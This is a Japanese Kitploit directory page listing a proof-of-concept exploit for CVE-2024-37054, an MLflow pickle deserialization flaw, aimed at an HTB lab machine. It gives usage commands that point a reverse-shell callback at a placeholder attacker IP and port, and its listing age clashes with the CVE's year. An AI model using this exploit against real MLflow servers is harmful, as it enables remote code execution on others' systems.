Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-37054-PoC — CVE-2024-37054 の PoC | Kitploit
ツール/GitHubGitHub/jimmexploit/cve-2024-37054-poc
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubjimmexploit/cve-2024-37054-poc

CVE-2024-37054-PoC

CVE-2024-37054 の PoC

リポジトリを見る
63ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

説明

CVE-2024-37054の概念実証です。MLflowバージョン0.9.0から2.14.1における深刻なデシリアライゼーションの脆弱性です。 悪意のあるpyfuncモデルが mlflow.pyfunc.load_model() を介して読み込まれると、pickleされたペイロードが任意のコードを実行します。

ファイル

  • exploit.py — 完全なエクスプロイト: 登録、訓練、アップロード、トリガー (HTB SmartHire Machine向け)
  • build_model.py — 悪意のあるモデルをローカルでビルド (ビルドのみ)

使用方法

モデルをローカルでビルド

root@kitploit:~
python3 build_model.py --lhost YOUR_IP --lport 4444

完全なエクスプロイトを実行

root@kitploit:~
# Auto register account and exploit
python3 exploit.py --lhost YOUR_IP --lport 4444 --atoz

# Use existing session
python3 exploit.py --lhost YOUR_IP --lport 4444 --session "eyJjb21w..."

免責事項

教育目的および許可されたペネトレーションテストにのみ使用してください。

ツールをダウンロード